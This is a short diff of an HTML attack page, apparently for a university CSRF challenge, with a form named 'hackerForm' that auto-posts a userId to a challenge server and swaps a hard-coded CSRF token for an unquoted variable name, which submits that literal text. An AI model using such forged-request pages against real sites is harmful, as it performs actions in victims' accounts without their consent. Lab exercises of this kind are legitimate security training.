--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
   <img src="http://klockren.se/klockren.png" style="width: 500px;" />
   <form name="hackerForm" action="https://snickerboa.it.liu.se/user/csrfchallengethree/plusplus" method="POST">
     <input type="text" name="userId" value="87d0d107b1521d76bb260cc345c13bf90f6f4cd6" />
-    <input type="hidden" name="csrfToken" value ="123" />
+    <input type="hidden" name="csrfToken" value =csrfToken />
     <input type="submit"/>
   </form>
 <script> 
